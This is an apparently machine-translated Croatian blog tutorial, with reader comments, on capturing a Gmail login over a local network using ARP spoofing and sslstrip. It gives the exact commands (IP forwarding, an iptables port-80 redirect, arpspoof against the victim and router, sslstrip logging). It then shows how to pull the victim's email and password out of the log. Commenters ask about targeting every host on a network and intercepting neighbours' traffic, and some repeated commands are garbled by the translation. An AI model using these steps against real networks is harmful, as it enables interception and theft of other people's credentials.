ArpSpoofing i SSlstrip u akciji.

Pozdrav blogeri.

Za danas imam mali uzorak koliko opasno može biti povezivanje u bilo koju mrežu bez sigurnosti onih koji se toliko nama sviđaju.

Za danas ću koristiti ArpSpoofing sa Sslstripom kako bih dobio lozinku za Gmail. Kako bih okoliš učinio kontroliranijim, stvorio sam račun pod nazivom "testarp@gmail.com".

A budući da mi se preambule ne sviđaju previše, prijeđimo na posao.

Ni u jednom trenutku nisam odgovoran za ono što mogu učiniti sa sljedećim informacijama. To radim isključivo u obrazovne svrhe

OKOLIŠ

Za ovaj test imamo sljedeće:

1. Napadač: Moje stolno ili stolno računalo ima Debian Wheezy. Iz spremišta možete instalirati sslstrip y dsniff stići imati harpsoofing

2. Žrtva: Žrtva je Android tablet koji svoju poštu želi vidjeti samo putem preglednika.

3. Medij: Sredina je moja Usmjerivač Cisco DPC2425

ADRESE.

Adresa napadača: 172.26.0.2

Adresa usmjerivača: 172.26.0.1

Adresa žrtve: 172.26.0.8

NAPAD:

Da biste malo više razumjeli kako napad djeluje, možete otići do mog starog POST

Prvo što ćemo učiniti za ovaj napad je aktiviranje prosljeđivanja kako bi naše računalo moglo proslijediti informacije žrtvi, a da ona to ne shvati. (Inače bi to bio napad uskraćivanja usluga)

Za to ćemo koristiti:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Svaka naredba u izravnom prozoru konzole.

Sada, ako napravimo tail -f iz linuxa, informacije vidimo uživo i izravno

 

snimka1

 

Pa kako onda dobiti ono što želimo?

Prvo unesite svoju poštu na Tablet. Tijekom prijave vidimo da se na našoj konzoli pojavljuju tisuće i tisuće stvari.

Sad kad ste završili, otvorit ćemo našu datoteku "desdelinux" s nano

nano desdelinux

s Control + W tražimo nešto što se zove SECURE POST.

I vidjet ćemo ovako nešto.

 

snimka2

 

Među tom ogromnom linijom koja se ne može vidjeti je žrtvina e-pošta i lozinka.

Pa trčimo udesno dok napokon ne ugledamo svjetlost na kraju tunela.

 

snimka3

 

Drugom ćemo prigodom vidjeti kako se možemo malo zaštititi od ovih napada.

pozdravi


Sadržaj članka pridržava se naših načela urednička etika. Da biste prijavili pogrešku, kliknite ovdje.

27 komentara, ostavi svoj

Ostavite svoj komentar

Vaša email adresa neće biti objavljen.

*

*

  1. Za podatke odgovoran: Miguel Ángel Gatón
  2. Svrha podataka: Kontrola neželjene pošte, upravljanje komentarima.
  3. Legitimacija: Vaš pristanak
  4. Komunikacija podataka: Podaci se neće dostavljati trećim stranama, osim po zakonskoj obvezi.
  5. Pohrana podataka: Baza podataka koju hostira Occentus Networks (EU)
  6. Prava: U bilo kojem trenutku možete ograničiti, oporaviti i izbrisati svoje podatke.

  1.   @Jlcmux dijo

    Koristim priliku i kažem da kad je objava objave naredbe nisu bile ispravne.

    Naredbi iptables na kraju nedostaje 8080 koji je na drugoj liniji. A tada su naredbe arpspoof bile na istoj liniji. Svaka naredba nalazi se na drugoj liniji.

    Nadam se da ga urednik vidi i može popraviti.

    Pozdrav.

    1.    Priručnik o izvoru dijo

      Uradio sam ispravke koje spominjete, je li to u redu?

      Ako ćete umetnuti kôd u željeni unos, upotrijebite HTML prikaz i provjerite je li članak točan prije slanja na čekanje. Hvala vam.

  2.   Luis dijo

    Hladno je znati da smo oni koji nemamo znanje toliko ranjivi. Vrlo dobre informacije čak i kad malo razumijem temu, shvaćam važnost. Hvala vam!
    pozdravi

  3.   Giskard dijo

    Ali to djeluje samo ako su napadač i žrtva na istoj mreži. U svakom slučaju, čini mi se da ako se (ako ste u istoj mreži) povežete pomoću HTTPS-a, to se ne događa jer su podaci šifrirani PRIJE napuštanja stroja. Ako se povežete putem HTTP-a (bez S), mislim da čak i gledajući mrežni kabel vidite ključeve.

    1.    @Jlcmux dijo

      To nije istina. Hakiram gmail lozinku i ako primijetite da gmail koristi https. Tako? Poanta je u tome što, iako je https siguran, ovisi o http-u. Dakle, nije tako sigurno.

      Ne priznajte toliko o https-u da S nije za Supermana, koliko da je "siguran"

    2.    RTen dijo

      radi sa ili bez https-a, probao sam ga sa specijaliziranijim linux distribucijskim sustavom i djeluje bez problema

    3.    Priručnik o izvoru dijo

      Možete ga precizno koristiti za podučavanje onih koji ukradu vaš Wi-Fi. 😀

      Otprilike je poput onoga što su davno rekli na blogu Cheme Alonso:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Rayonant dijo

        Ostia, sjajno što radi! / I onda kažu mojem paranoiku svaki put kad koristim VPN kad odu provjeriti bankovni račun ...). Usput u komentarima morate vidjeti koliko su ljudi cinični ... ako na kraju kradu ...

        1.    eliotime3000 dijo

          Sada moramo uzeti vodič o tome kako stvoriti i ponuditi vlastitu VPN uslugu.

      2.    Danijel dijo

        Priča koju povezujete vrlo je zanimljiva, čak se čini vrijednom nove knjige, i ovo me podsjeća na to kada sam koristio internet svojih susjeda i iako kažem da znam tu temu, mislim da nikada ne bih mogao vidjeti prave dimenzije opasnosti koju bih mogao imati zadnji, na moju sreću, promijenili su samo lozinku u WPA2 i tu je započela moja priča s ISP-om haha

    4.    Mauricijus dijo

      Zato naslov kaže Sslstrip na djelu.

      Djeluje, sve dok je napadač u sredini

  4.   smjesta dijo

    Koji val radite na prizmi? -.-
    nema.
    Što čekate da pošaljete svoj zahtjev XD
    pozdravi
    dobar post

  5.   auroszx dijo

    Zanimljivo, kasnije ću napraviti edukativni test ... Možda bih mogao i ukloniti lozinku za WiFi i malo se zabaviti 😛
    Bilo kojim slučajem, možete li učiniti nešto slično za slanje različitih stranica na one koje je cilj tražio? Na primjer, oni žele otvoriti Facebook, a ja ih preusmjerim na Google? 😛

    1.    @Jlcmux dijo

      Da. Ali sve je to sasvim drugačija rola.

      Možda ću ga objaviti kasnije.

  6.   zadnjinewbie dijo

    vrlo dobar post, ove su teme vrlo edukativne, sada moramo biti u stanju suzbiti ovaj napad, jer bi se neki (poput mene) povezali s javnim mrežama (na primjer sveučilište), bilo bi korisno to izbjeći.

    Pozdrav!

  7.   samo-još-dl-korisnik dijo

    Nije mi uspjelo 🙁

  8.   wow dijo

    Nešto mi ovdje ne uspijeva, osim činjenice da su https veze šifrirane putem certifikata poslužitelja (kada certifikat imate na svojem računalu, vaš je preglednik zadužen za šifriranje) pomoću iptables preusmjeravate port 80 (http), a ne 443 što je https

    1.    @Jlcmux dijo

      I ja sam to mislio. Poanta je u tome što, iako je https "siguran", nažalost ovisi o http-u. Dakle, sslstrip to koristi, što čini da preglednik vjeruje da koristi https vjerodajnice, ali nije.

      1.    wow dijo

        sveto sranje! ali preglednik bi trebao vidjeti upozorenje poput "ovaj certifikat dolazi sa sumnjive web lokacije ili slično tome" ... Svakako ću morati obaviti testove XD

        1.    @Jlcmux dijo

          Ne, apsolutno ništa ne izlazi.

  9.   samo-još-dl-korisnik dijo

    Napokon mi je uspjelo
    Na WEP mrežu povezan sam lozinkom, a lozinka mi je ionako pokazala izravno.

    Upit. Možete li napraviti isti postupak, ali za sva računala koja su povezana u mrežu, umjesto da imate samo jednu žrtvu?

    1.    @Jlcmux dijo

      Da, možeš. Ali nisam radio eksperimente. Isprobajte sami i recite nam kako ste.

  10.   sinnick19 dijo

    Jedino što s tim shvatim je da se žrtvin stroj isključi, ali sslstrip mi ne pokazuje ništa: /

    1.    @Jlcmux dijo

      Trebali biste na trenutak onemogućiti vatrozid. Ili barem omogućiti dolazne veze.

  11.   Mr Black dijo

    Probe i ja smo mogli vidjeti samo korisničko ime i lozinku facebook stranice, u gmailu nisam pronašao nikakav rezultat u zapisniku, također mi je trebao samo redak arpspoof «arpspoof -i -t«. S druge strane, stroj za žrtve nije mogao otvoriti neke stranice. Nastavit ću s istragom, vrlo je zanimljivo. Pomoć onima koji koriste Manjaro, paketi za instalaciju su: dsniff (ovdje je arpspoff), twisted i python2-pyopenssl. Sslstrip možete preuzeti ovdje: http://www.thoughtcrime.org/software/sslstrip/
    Da biste ga pokrenuli $ python2 sslstrip.py
    Pozdrav.

  12.   Mr Black dijo

    Nije izašao, ali arpspoof linija je: #arpspoof -i int -t ip-žrtva ip-usmjerivač

  13.   Gilbert dijo

    gledaj, radim točno ono što kažeš:

    echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PRERUTIRANJE -p tcp –odredišni port 80 -j REDIRECT –to-ports 8080

    arppoof -i eth0 -t 172.26.0.8 172.26.0.1
    arppoof -i eth0 -t 172.26.0.1 172.26.0.2

    problem je u tome što žrtva koja je još jedno računalo koje imam ovdje u svojoj sobi nemam veze s tim da moram ponovno pokrenuti usmjerivač, što mi može pomoći.

    Još jedna stvar je što radim s virtualnim strojem, a kada izvršim naredbu iwconfig, wlan0 se ne pojavljuje, niti kada izvršavam ifconfig, međutim ako na svom virtualnom stroju imam internet, što s eth0 sučeljem.

bool (istina)